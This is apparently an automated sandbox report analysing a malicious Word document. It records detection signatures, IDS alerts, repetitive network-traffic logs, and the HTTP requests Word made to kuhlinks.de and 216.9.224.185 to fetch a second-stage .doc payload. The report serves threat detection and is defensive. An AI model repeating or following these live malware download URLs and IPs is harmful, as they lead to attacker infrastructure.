Edit tour

Windows Analysis Report
IMP 7527518303 2507294.docx.doc

Overview

General Information

Sample name:IMP 7527518303 2507294.docx.doc
Analysis ID:1654507
MD5:c8675988aa2bc47338861b4d62aa517d
SHA1:67366589c5fbfa1153aa10a3d06b88d12719cdca
SHA256:315b8754f30097fb04f76e09719a8415c53103a8c8abd6c7e988a918a2791476
Tags:docuser-lowmal3
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w11x64_office
  • WINWORD.EXE (PID: 7312 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 60832, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7312, Protocol: tcp, SourceIp: 172.67.144.140, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-02T12:00:42.919911+020018100041Potentially Bad Traffic192.168.2.2460838172.67.144.140443TCP
2025-04-02T12:00:43.414685+020018100041Potentially Bad Traffic192.168.2.2460840216.9.224.18580TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-04-02T12:00:40.599604+020018100051Potentially Bad Traffic192.168.2.2460833172.67.144.140443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: IMP 7527518303 2507294.docx.docVirustotal: Detection: 13%Perma Link
Source: IMP 7527518303 2507294.docx.docReversingLabs: Detection: 16%
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.67.144.140:443 -> 192.168.2.24:60832 version: TLS 1.2
Source: global trafficDNS query: name: kuhlinks.de
Source: global trafficDNS query: name: 185.224.9.216.in-addr.arpa
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global trafficTCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global trafficTCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global trafficTCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global trafficTCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global trafficTCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global trafficTCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global trafficTCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80

Networking

barindex
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60840 -> 216.9.224.185:80
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60838 -> 172.67.144.140:443
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.24:60833 -> 172.67.144.140:443
Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /3ri5DVX HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: kuhlinks.deConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknownTCP traffic detected without corresponding DNS query: 216.9.224.185
